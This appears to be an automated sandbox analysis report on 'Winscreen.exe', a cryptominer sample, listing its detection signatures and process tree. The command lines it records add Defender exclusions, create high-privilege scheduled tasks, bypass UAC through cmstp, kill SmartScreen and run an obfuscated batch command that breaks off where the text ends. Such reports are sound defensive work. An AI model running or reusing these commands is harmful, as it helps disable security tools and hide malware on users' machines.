Edit tour
Windows
Analysis Report
Winscreen.exe
Overview
General Information
Detection
Xmrig
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell decode and execute
Yara detected UAC Bypass using CMSTP
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Creates an undocumented autostart registry key
Creates autorun.inf (USB autostart)
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Enables a proxy for the internet explorer
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sets a proxy for the internet explorer
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the driver directory
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Userinit Child Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
- Winscreen.exe (PID: 6564 cmdline:
"C:\Users\ user\Deskt op\Winscre en.exe" MD5: 05B30A117A6915C4591C65449E83F0A4) - powershell.exe (PID: 3624 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nPath 'C:\ Users\user \AppData\R oaming\exp lorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3872 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 2380 cmdline:
"C:\Window s\System32 \schtasks. exe" /Crea te /F /TN "explorer" /SC ONLOG ON /TR "C: \Users\use r\AppData\ Roaming\ex plorer.exe " /RL HIGH EST MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 4304 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - explorer.exe (PID: 1436 cmdline:
"C:\Users\ user\AppDa ta\Roaming \explorer. exe" MD5: 753F5F61C1F444BB1524A26C0DF29F38) - cmstp.exe (PID: 1488 cmdline:
"c:\window s\system32 \cmstp.exe " /au C:\W indows\tem p\xtm5g4p2 .inf MD5: 4CC43FE4D397FF79FA69F397E016DF52) - schtasks.exe (PID: 1412 cmdline:
"C:\Window s\System32 \schtasks. exe" /Crea te /F /TN "upx" /SC ONLOGON /T R "C:\User s\user\App Data\Roami ng\upx.exe " /RL HIGH EST MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 6600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - upx.exe (PID: 5588 cmdline:
"C:\Users\ user\AppDa ta\Roaming \upx.exe" MD5: 78CC94F417D1BE1A25ACE9F52D52E23D) - powershell.exe (PID: 1848 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nPath 'C:\ Users\user \AppData\R oaming\tas kmoder.exe ' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3752 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 3536 cmdline:
"C:\Window s\System32 \schtasks. exe" /Crea te /F /TN "taskmoder " /SC ONLO GON /TR "C :\Users\us er\AppData \Roaming\t askmoder.e xe" /RL HI GHEST MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 6152 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskmoder.exe (PID: 6756 cmdline:
"C:\Users\ user\AppDa ta\Roaming \taskmoder .exe" MD5: 2A48F51475C2EB426B304DDDCF3F85F5) - cmd.exe (PID: 4284 cmdline:
"C:\Window s\System32 \cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "taskm oder.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6104 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - choice.exe (PID: 5804 cmdline:
choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4) - cmd.exe (PID: 3596 cmdline:
"C:\Window s\System32 \cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5736 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 2448 cmdline:
"cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2676 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 6948 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Pr ogramData\ winlog.vbs " MD5: FF00E0480075B095948000BDC66E81F0) - taskkill.exe (PID: 6832 cmdline:
"C:\Window s\System32 \taskkill. exe" /f /i m smartscr een.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - conhost.exe (PID: 3784 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - userinit.exe (PID: 736 cmdline:
"C:\Window s\System32 \userinit. exe" MD5: 24892AC6E39679E3BD3B0154DE97C53A) - explorer.exe (PID: 1788 cmdline:
C:\Windows \Explorer. EXE MD5: 662F4F92FDE3557E86D110526BB578D5) - wscript.exe (PID: 5456 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Pr ogramData\ winlog.vbs " MD5: FF00E0480075B095948000BDC66E81F0) - wscript.exe (PID: 348 cmdline:
"C:\Window s\System32 \wscript.e xe" "C:\Pr ogramData\ izjuqhimv. vbs" MD5: FF00E0480075B095948000BDC66E81F0) - cmd.exe (PID: 5748 cmdline:
"C:\Window s\System32 \cmd.exe" /c @echo off Set a1 zr=YNB0FrM P4GIJbxjaq Usk6Cc5ERi HfyAhvwD31 pOL7WdnQSK tu8goe2lTX 9ZmzV cls @%a1zr:~52 ,1%%a1zr:~ 22,1%%a1zr :~31,1%%a1 zr:~51,1% %a1zr:~51, 1%%a1zr:~2 8,1%%a1zr: ~28,1% %a1 zr:~18,1%% a1zr:~52,1 %%a1zr:~47 ,1%%a1zr:~ 54,1%%a1zr :~51,1%%a1 zr:~22,1%% a1zr:~15,1 %%a1zr:~54 ,1% %a1zr: ~5,1%%a1zr :~52,1%%a1 zr:~50,1% %a1zr:~15, 1%%a1zr:~4 2,1%%a1zr: ~42,1% "%a 1zr:~27,1% %a1zr:~46, 1%%a1zr:~3 9,1%%a1zr: ~6,1%\%a1z r:~45,1%%a 1zr:~38,1% %a1zr:~4,1 %%a1zr:~55 ,1%%a1zr:~ 41,1%%a1zr :~30,1%%a1 zr:~25,1%% a1zr:~24,1 %\%a1zr:~6 ,1%%a1zr:~ 26,1%%a1zr :~22,1%%a1 zr:~5,1%%a 1zr:~51,1% %a1zr:~18, 1%%a1zr:~5 1,1%%a1zr: ~28,1%%a1z r:~47,1%\% a1zr:~41,1 %%a1zr:~26 ,1%%a1zr:~ 43,1%%a1zr :~42,1%%a1 zr:~51,1%% a1zr:~33,1 %%a1zr:~18 ,1% %a1zr: ~1,1%%a1zr :~55,1%\%a 1zr:~21,1% %a1zr:~48, 1%%a1zr:~5 ,1%%a1zr:~ 5,1%%a1zr: ~52,1%%a1z r:~43,1%%a 1zr:~47,1% %a1zr:~61, 1%%a1zr:~5 2,1%%a1zr: ~5,1%%a1zr :~18,1%%a1 zr:~26,1%% a1zr:~51,1 %%a1zr:~43 ,1%\%a1zr: ~41,1%%a1z r:~26,1%%a 1zr:~43,1% %a1zr:~54, 1%%a1zr:~5 1,1%%a1zr: ~50,1%%a1z r:~51,1%%a 1zr:~43,1% " /%a1zr:~ 32,1% %a1z r:~45,1%%a 1zr:~31,1% %a1zr:~52, 1%%a1zr:~5 4,1%%a1zr: ~54,1% /%a 1zr:~47,1% %a1zr:~25 ,1%%a1zr:~ 24,1%%a1zr :~9,1%_%a1 zr:~45,1%% a1zr:~58,1 % /%a1zr:~ 42,1% "%a1 zr:~52,1%% a1zr:~13,1 %%a1zr:~37 ,1%%a1zr:~ 54,1%%a1zr :~51,1%%a1 zr:~5,1%%a 1zr:~52,1% %a1zr:~5,1 %.%a1zr:~5 2,1%%a1zr: ~13,1%%a1z r:~52,1%,% a1zr:~21,1 %:\%a1zr:~ 41,1%%a1zr :~26,1%%a1 zr:~43,1%% a1zr:~42,1 %%a1zr:~51 ,1%%a1zr:~ 33,1%%a1zr :~18,1%\%a 1zr:~47,1% %a1zr:~15, 1%%a1zr:~1 8,1%%a1zr: ~19,1%%a1z r:~59,1%%a 1zr:~52,1% %a1zr:~43, 1%.%a1zr:~ 52,1%%a1zr :~13,1%%a1 zr:~52,1%" /%a1zr:~2 8,1% %a1z r:~5,1%%a1 zr:~52,1%% a1zr:~50,1 % %a1zr:~1 5,1%%a1zr: ~42,1%%a1z r:~42,1% " %a1zr:~27, 1%%a1zr:~4 6,1%%a1zr: ~39,1%%a1z r:~6,1%\%a 1zr:~45,1% %a1zr:~38, 1%%a1zr:~4 ,1%%a1zr:~ 55,1%%a1zr :~41,1%%a1 zr:~30,1%% a1zr:~25,1 %%a1zr:~24 ,1%\%a1zr: ~6,1%%a1zr :~26,1%%a1 zr:~22,1%% a1zr:~5,1% %a1zr:~51, 1%%a1zr:~1 8,1%%a1zr: ~51,1%%a1z r:~28,1%%a 1zr:~47,1% \%a1zr:~41 ,1%%a1zr:~ 26,1%%a1zr :~43,1%%a1 zr:~42,1%% a1zr:~51,1 %%a1zr:~33 ,1%%a1zr:~ 18,1% %a1z r:~1,1%%a1 zr:~55,1%\ %a1zr:~21, 1%%a1zr:~4 8,1%%a1zr: ~5,1%%a1zr :~5,1%%a1z r:~52,1%%a 1zr:~43,1% %a1zr:~47, 1%%a1zr:~6 1,1%%a1zr: ~52,1%%a1z r:~5,1%%a1 zr:~18,1%% a1zr:~26,1 %%a1zr:~51 ,1%%a1zr:~ 43,1%\%a1z r:~41,1%%a 1zr:~26,1% %a1zr:~43, 1%%a1zr:~5 4,1%%a1zr: ~51,1%%a1z r:~50,1%%a 1zr:~51,1% %a1zr:~43, 1%" /%a1zr :~32,1% %a 1zr:~17,1% %a1zr:~18, 1%%a1zr:~5 2,1%%a1zr: ~5,1%%a1zr :~26,1%%a1 zr:~43,1%% a1zr:~26,1 %%a1zr:~47 ,1% /%a1zr :~47,1% %a 1zr:~25,1% %a1zr:~24, 1%%a1zr:~9 ,1%_%a1zr: ~45,1%%a1z r:~58,1% / %a1zr:~42, 1% "%a1zr: ~21,1%:\%a 1zr:~41,1%